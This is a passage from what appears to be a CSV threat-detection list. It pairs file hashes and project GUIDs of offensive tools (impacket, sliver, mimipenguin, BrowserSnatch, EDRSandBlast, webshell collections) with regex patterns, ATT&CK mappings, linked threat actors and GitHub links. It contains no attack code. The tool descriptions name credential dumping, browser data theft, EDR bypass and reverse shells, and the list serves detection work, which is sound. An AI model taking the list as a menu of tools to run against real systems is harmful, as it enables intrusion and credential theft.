"*7DB2951389A8839D1CC00088A7A2C2432B396D742CABEEC317C02C7B8564250D*",".{0,1000}7DB2951389A8839D1CC00088A7A2C2432B396D742CABEEC317C02C7B8564250D.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29698" "*7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061*",".{0,1000}7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29699" "*7dbc46ea673ab508a7b9121b0a49d29470a8fc01669105173fd2a52f88dd946a*",".{0,1000}7dbc46ea673ab508a7b9121b0a49d29470a8fc01669105173fd2a52f88dd946a.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","29701" "*7dc0339f87f1d3e213a24cecd058ca8abbf7dd271eccf5b168529d30b9d708ba*",".{0,1000}7dc0339f87f1d3e213a24cecd058ca8abbf7dd271eccf5b168529d30b9d708ba.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29702" "*7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b*",".{0,1000}7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29705" 
"*7dd6329b978fd795c42131075b4fc6eaa16b759594c8e80402e7d8221d6c639e*",".{0,1000}7dd6329b978fd795c42131075b4fc6eaa16b759594c8e80402e7d8221d6c639e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29706" "*7de6e20c24d452409937f4869770848445952afa1ff26288dfb558d8edc64def*",".{0,1000}7de6e20c24d452409937f4869770848445952afa1ff26288dfb558d8edc64def.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","29709" "*7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb*",".{0,1000}7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","29710" "*7dea0ea9ae8fe294dbe38f27a1e718298ce411f3bcc86084741b8484276ea8a6*",".{0,1000}7dea0ea9ae8fe294dbe38f27a1e718298ce411f3bcc86084741b8484276ea8a6.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI 
signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","29711" "*7decdf6084875e659632431939e99c23db088fb991d5102a7646f27f27461ce4*",".{0,1000}7decdf6084875e659632431939e99c23db088fb991d5102a7646f27f27461ce4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29712" "*7deeafff78ee13e8c4a8073ab7a66265d54b40abeb2bc0691e905176df785401*",".{0,1000}7deeafff78ee13e8c4a8073ab7a66265d54b40abeb2bc0691e905176df785401.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29713" "*7df4d9b5a4c5a9f74497a4493fa1c4fe28d3e8f4436fcea903bd2b63e006951b*",".{0,1000}7df4d9b5a4c5a9f74497a4493fa1c4fe28d3e8f4436fcea903bd2b63e006951b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29714" 
"*7dfb0ece83deed38190bb57a9aab44a101203fa7e0b3e633e7c7231173a43fd1*",".{0,1000}7dfb0ece83deed38190bb57a9aab44a101203fa7e0b3e633e7c7231173a43fd1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29717" "*7dfb613a59e09dd5f01a83c3980fc661ccfc2875c2091165c54e5989954907cc*",".{0,1000}7dfb613a59e09dd5f01a83c3980fc661ccfc2875c2091165c54e5989954907cc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29718" "*7e1537d35b2a1d993bda4eb5531d479f19b9381db45fd16a9163703ae7602f44*",".{0,1000}7e1537d35b2a1d993bda4eb5531d479f19b9381db45fd16a9163703ae7602f44.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29722" "*7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46*",".{0,1000}7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","29724" "*7e1631ef7fe36cd300de646c9a3f6d55d162b28f8909adda2a9ca7443d11257b*",".{0,1000}7e1631ef7fe36cd300de646c9a3f6d55d162b28f8909adda2a9ca7443d11257b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29725" "*7E1BCC8E-F61C-4728-BB8A-28FB42928256*",".{0,1000}7E1BCC8E\-F61C\-4728\-BB8A\-28FB42928256.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#GUIDproject","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","29726" "*7e21c5b9cf9cb3cc0b3c6909fdf3a7820c6feaa45e86722ed4e7a43d39aee819*",".{0,1000}7e21c5b9cf9cb3cc0b3c6909fdf3a7820c6feaa45e86722ed4e7a43d39aee819.{0,1000}","offensive_tool_keyword","potato","Potato Privilege 
Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","29728" "*7e2a0b36073628e014853163888d45cd84994109cdc61267706d3c9f63b97ed3*",".{0,1000}7e2a0b36073628e014853163888d45cd84994109cdc61267706d3c9f63b97ed3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29731" "*7e3584959c0b499046b43d241e6199b64878655ba0c56319590ecb75eb14acd9*",".{0,1000}7e3584959c0b499046b43d241e6199b64878655ba0c56319590ecb75eb14acd9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29732" "*7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137*",".{0,1000}7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29733" "*7e3de37367d5aaa89be6034e8afc57740bd50397b244fcf7690dde4299f724e9*",".{0,1000}7e3de37367d5aaa89be6034e8afc57740bd50397b244fcf7690dde4299f724e9.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29738" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","29739" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","29740" 
"*7e40488e6ce8545eccdcfd13124e609ff74c50a9ce89bc88b9b2b50862efda9c*",".{0,1000}7e40488e6ce8545eccdcfd13124e609ff74c50a9ce89bc88b9b2b50862efda9c.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","29741" "*7e45d5def0e8c355baf38688273584fa1e9e5c2d245d1535b5c965ce568d8a13*",".{0,1000}7e45d5def0e8c355baf38688273584fa1e9e5c2d245d1535b5c965ce568d8a13.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29742" "*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","#GUIDproject","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","29744" "*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/Dec0ne/ShadowSpray","1","0","#GUIDproject","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","29745" "*7e4fc58a02442bd5021c2a0b1bc032a1b65dfa1dbb182fc9a13e4716da7c51d9*",".{0,1000}7e4fc58a02442bd5021c2a0b1bc032a1b65dfa1dbb182fc9a13e4716da7c51d9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29746" "*7e51d4af53fe54a5b886d342e26a5b87619c7e1ba29f014012e7e30f157dcd4e*",".{0,1000}7e51d4af53fe54a5b886d342e26a5b87619c7e1ba29f014012e7e30f157dcd4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29747" "*7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7*",".{0,1000}7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29748" "*7e5d70e9ea31688ed3b6192e0f4bc7ba02b6d3fc772598ac187c02275a44cc02*",".{0,1000}7e5d70e9ea31688ed3b6192e0f4bc7ba02b6d3fc772598ac187c02275a44cc02.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 
- T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29751" "*7e643e4b2ed8bc2dda5c6d450f16a8d2ca38ad306ef26c351cec58db97d237a7*",".{0,1000}7e643e4b2ed8bc2dda5c6d450f16a8d2ca38ad306ef26c351cec58db97d237a7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29752" "*7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854*",".{0,1000}7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29754" "*7e6e3c02e49c8405a5680d9058fd328683b4f1d10fb9d40d9d16277cc80cacf3*",".{0,1000}7e6e3c02e49c8405a5680d9058fd328683b4f1d10fb9d40d9d16277cc80cacf3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29755" "*7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883*",".{0,1000}7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29756" "*7e79f9041f4009d963ab05ffee97702646026b16bed9694e059b813c261b973c*",".{0,1000}7e79f9041f4009d963ab05ffee97702646026b16bed9694e059b813c261b973c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29758" "*7e7c5b1923a84ddf3fcf224536dd9c917bd12ce73d5e512ee293fb6f44dc1bb4*",".{0,1000}7e7c5b1923a84ddf3fcf224536dd9c917bd12ce73d5e512ee293fb6f44dc1bb4.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29759" "*7e94404dc46259916898e5400c4511f885e873dd0fe75357c178053b60b6f7ed*",".{0,1000}7e94404dc46259916898e5400c4511f885e873dd0fe75357c178053b60b6f7ed.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29762" "*7e95bcfab0010c0c17569f50af87efd1beb4e81952ad8b24166643353a39fa25*",".{0,1000}7e95bcfab0010c0c17569f50af87efd1beb4e81952ad8b24166643353a39fa25.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29763" "*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*",".{0,1000}7E9729AA\-4CF2\-4D0A\-8183\-7FB7CE7A5B1A.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","#GUIDproject","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","29764" "*7ea18c700dcc3444fb59a36f589613bb97c3d17ed8ad43e005cae75d35e61f60*",".{0,1000}7ea18c700dcc3444fb59a36f589613bb97c3d17ed8ad43e005cae75d35e61f60.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29765" "*7ea370e3fb26387369e0d4f173cbf6df072ab2f6b3c4de43795e6fc1c1e74af3*",".{0,1000}7ea370e3fb26387369e0d4f173cbf6df072ab2f6b3c4de43795e6fc1c1e74af3.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation 
tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","29766" "*7ea564978060c0773bf97da056d612768bcc47cf4bd0bd7b1a98c5b61bd00af1*",".{0,1000}7ea564978060c0773bf97da056d612768bcc47cf4bd0bd7b1a98c5b61bd00af1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29767" "*7eaaaa6fe51a14b8e5ad3f4163024c3230ef8ca9f1c0b5b039ba16b6a11fbf7d*",".{0,1000}7eaaaa6fe51a14b8e5ad3f4163024c3230ef8ca9f1c0b5b039ba16b6a11fbf7d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - 